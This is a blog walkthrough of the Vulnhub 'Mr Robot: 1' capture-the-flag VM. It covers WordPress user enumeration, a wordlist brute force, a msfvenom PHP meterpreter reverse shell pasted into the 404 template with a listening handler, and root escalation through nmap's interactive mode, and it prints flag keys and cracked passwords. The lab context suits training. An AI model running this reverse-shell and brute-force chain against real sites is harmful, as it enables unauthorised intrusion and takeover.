Mr Robot:1 CTF Walkthrough



Mr Robot: 1 CTF (Capture the Flag) is a downloadable Virtual Machine from Vulnhub.  Which is a site that has purposely built Virtual machines for you to hack. Each one varies in difficulty and allows you to hone your skills and even pick up new ones.


If your interested in giving it a go yourself, this Virtual Machine can be downloaded here


Based on the show Mr Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is Progressively difficult to find.

The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

So I downloaded the virtual machine from vulnhub and then just double clicked the mrRobot.ova file and it set its self up in virtualbox.

I set the network up so only the Mr Robot VM and kali Linux where on the same subnet, to make it easier to find and you don’t really want to be exposing Vulnerable Virtual machines on your live network. The VM has DHCP enabled so it gets a DHCP lease straight off the bat.

My first step is to find out what ip the VM is on and what goodies it has to offer, So I run Nmap to find all this out for me.

nmap -A

and it gives me this information back.

Nmap scan report for
Host is up (0.00029s latency).
Not shown: 997 filtered ports
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject:
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
MAC Address: 08:00:27:C1:4A:90 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.19

Network Distance: 1 hop


1 0.29 ms

As you can see looks like we have an Apache web server running with ports 80 and 443 open, so lets check them out first.



With both http and https we get presented with a cool animation of a linux terminal booting up and Mr Robot logging in.



At the prompt the only commands that work are the 6 listed above. Each one takes you to its own page which contains all sorts of Mr Robot propaganda it looks like its a rip of a Mr Robot promotional website. Took note of each page just in case i needed it later.

Looking at the source we can see this animation has been created in javascript also there is some interesting info on line 15, I would like to just add “i am not expert in javascript” but it looks like if you have an ip of you get taken to index.html.



At this stage I thought it was time to check out the robots.txt

User-agent: *

Boom!  So it looks like I have found key-1-of-3.txt and a fsocity.dic file .

I first navigate to the key file at and get the first key  073403c8a58a1f80d943455fb30724b9

Then I download fsocity.dic which is just a dictionary file, I’m guessing this is something that we will have to use later so ill keep that somewhere safe.

When the dictionary file had finished downloading, I kind of just mashed the keyboard with adfsda after the IP address and I received  wordpress 404 page as below



Clicking around the menus, I quite quickly found the Word Press login page at

Now we know its a Word Press site we can  try and enumerate users using Wpscan

wpscan --url --enumerate u

This actually did not find any users for me, so I started to use process of elimination and tried  admin, root and  user all giving me a Invalid username


So still with no users, I start to use names from characters in the TV series, starting at mrrobot,  flipper and then we get a hit with elliot ..

elliotwrong password

Cool so we have a user the next step will be to use that dictionary file we downloaded earlier and see if we can  brute force the password for this account. so lets take a look at the dictionary file…

first thing I notice when I cat the dictionary file is that its not in any sequential order. This can rectified  by just running a sort command in the Linux terminal

sort fsocity.dic >fsocitysorted.dic

I cat the new fsocitysorted.dic file and noticed there are a lot of repeated words, so we can run the sort command again but pipe it into the uniq command as below, giving us a nice and tidy dictionary file for us to run our brute force against.

sort fsocity.dic | uniq > fsocitysortunique.dic

So lets use wpscan again to brute force the login using our new dictionary file as so.

wpscan --url --wordlist /location/of/wordlist/fsocitysortunique.dic --username elliot



This took about 3 minutes to find this password for elliot.

  | Id | Login  | Name | Password  |
  |    | elliot |      | ER28-0652 |

I put the above details in to page and bingo we are into the WordPress dashboard.



Now we are into the Word Press Dashboard we can quite easily use metersploit to create a payload and gain a shell on the web server.

Our First step is to create our metersploit payload using msfvenom.

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=7771 -f raw -o payload.php

Now we have our payload, we need to get this on the site and run it. The best place for this is the 404 page template

In the dashboard go to the menu on the left and click on Appearance –> Editor –> then on the right click 404 Template.

Next open up your payload with any text editor and copy the contents over the top of the 404 template and click update file.

now we need to create our payload handler in metersploit so open up a new terminal and type …..

$ msfconsole
$ use exploit/multi/handler
$ set payload php/meterpreter/reverse_tcp
$ set LHOST
$ set LPORT 7771
$ run

After you typed ‘run’ and hit enter your payload handler should start and all we need to do now is run our payload by making the site display a 404 page and we are in.

[*] Started reverse TCP handler on 
[*] Starting the payload handler...
[*] Sending stage (33721 bytes) to
[*] Meterpreter session 1 opened ( -> at 2016-08-19 17:00:48 +0100

meterpreter > 

Then in meterpreter just type shell to spawn a shell on the box and then check what directory  we are in and which user we are.

meterpreter > shell 
Process 1797 created.
Channel 0 created. 

Then I changed directory to the root of the drive and list every thing that’s there.

cd / 

I start by checking out the home folder, this seems to have just one folder in it called robot, so I navigate into the robot folder and it looks like we have found our next key and an md5 file.

cd home
cd robot

First I try to cat the contents of the key file, but I get a permission denied,  I also try the password.raw-md5 file this time it does display the contents on the screen see below.

cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
cat password.raw-md5

So it looks like we have a username and a md5 hashed password.. I could run this through hashcat but I thought as this is a easy hackable VM, I would google the hash first and as I thought the hash comes back quite quickly as abcdefghijklmnopqrstuvwxyz.


I try and switch user to robot but I keep getting a message telling me that su must be run from terminal.

su robot 
su: must be run from a terminal

This shows that we don’t have a proper shell running, so we can use a bit of python foo to get full terminal access using this command below.

python -c 'import pty; pty.spawn("/bin/bash")'

We can tell we are in the proper shell as the start of the line tells us what user we are, the name of the server and then what folder we are in.

[email protected]:/home/robot$

So we try and switch to the robot user again and we now get prompt to enter the password .  Once we have entered the password for the MD5 hash we are now logged in as Robot.

[email protected]:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

[email protected]:~$

now that we are logged in as robot, we should be able to cat the contents of that key file as we now have the right permissions.

[email protected]:~$ cat key-2-of-3.txt
cat key-2-of-3.txt

Now with key 2 found we just have one more to find. I’m guessing to do this we need to escalate privileges again to become the root user. I tried a few exploits off exploitDB but none of these worked  so i started looking at other ways to get to root.

Dumping out the list of processes shows Nmap is set to run as root.

find / -perm +6000 2>/dev/null | grep '/bin/'

After a lot of googling I found there is a vulnerability in Nmap, which you can set into interactive mode and allows you to run shell commands directly in nmap.

[email protected]:/$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# ls
bin   dev  home        lib    lost+found  mnt  proc  run   srv tmp  var
boot  etc  initrd.img  lib64  media   opt  root  sbin  sys usr  vmlinuz
# cd /root
cd /root
# ls
firstboot_done key-3-of-3.txt

so we escalated our privileges to root through the interactive shell and navigated to the root folder as u can see above this holds our final key which we cat to give us ….

cat key-3-of-3.txt

Now we have all 3 keys that’s this Virtual Machine done… It was a really good virtual machine to get started with, also finding out about the privilege escalation using Nmap was fantastic and being a fan of Mr Robot TV show really helped with keeping me interested.

Going to go have another look at vulnhub and see if there are anymore TV/Movie tie ins that I can sink my teeth into….



Leave a Reply

Your email address will not be published. Required fields are marked *